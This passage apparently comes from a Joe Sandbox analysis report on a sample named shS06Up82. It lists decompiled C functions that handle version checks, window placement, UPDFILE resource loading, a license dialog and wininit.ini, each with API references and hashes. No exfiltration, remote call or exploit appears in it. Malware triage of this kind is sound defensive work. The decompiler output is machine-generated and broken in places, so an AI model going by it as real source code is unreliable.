                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E003E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t11 =  &_v32; // 0x3e3938
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									_t16 =  &_v32; // 0x3e3938
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E003E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E003E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 003E2A6F
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharUpperA.USER32(59D037E4,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                        • Part of subcall function 003E2773: CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                        • Part of subcall function 003E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                        • Part of subcall function 003E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,003E3938,?,?,?,?,-00000005), ref: 003E2958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 003E2969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,003E3938,?,?,?,?,-00000005,?), ref: 003E2A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,003E3938,?,?), ref: 003E2A81
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID: 89>
                                                                                                                                                                                                      • API String ID: 3949799724-450690347
                                                                                                                                                                                                      • Opcode ID: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                      • Instruction ID: 2e23d057014228d1a5f60314e5a6d2b8ce67147ceaec9509420e279ea1829762
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2514E31D00269DFCB26DF99C884AAEFBB9FF48700F15422AE901E7291DB319D41DB90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003E43F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003E440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 003E4423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 003E442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 003E443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 003E4447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003E44A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                      • Instruction ID: 20c56016b3e6fa49a1425c0a572bfb52614d09ef14f317cb4db901b32f0ea557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6315071F00559AFCB15CFB9DD899EEBBB9EB89310F154269F805F7280DA30AD058B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E003E6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E003E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0x3ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E003E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E003E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}


                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 003E6345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E6357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                      • Instruction ID: df52757633c280b0df0c3b9b208c4049b07d8c71e1fb2e04ba42c04aad1cc8ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D21F879A00269ABDB229F658C869FE7B7CEB44750F110319F902A72D1DB359D018BE1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E003E468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0x3e8d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E003E468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0x3e8d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E003E6517(_t19, 0x7d1, 0, E003E3100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0x3e8d4c);
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F64,?,00000002,00000000), ref: 003E3A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 003E3AB3
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 003E3AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 003E3B13
                                                                                                                                                                                                        • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                        • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                        • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                        • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,003E3100,00000000,00000000), ref: 003E3AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: 749b809d00a49851e50aa75b46a05ac7916cbc56aa2035b5c15ef1c64af8f436
                                                                                                                                                                                                      • Instruction ID: e316f2f44a77d860f4f272488d47078156643b0752f2ac52c25f207fd30dccc1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 749b809d00a49851e50aa75b46a05ac7916cbc56aa2035b5c15ef1c64af8f436
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 901190306002E1ABD733AB23AC4DF577AADDBD9750F10472EB546DE2E1DA7988009A60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E24E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E003E658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 003E2506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 003E252C
                                                                                                                                                                                                      • _lopen.KERNEL32 ref: 003E253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 003E254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 003E2555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
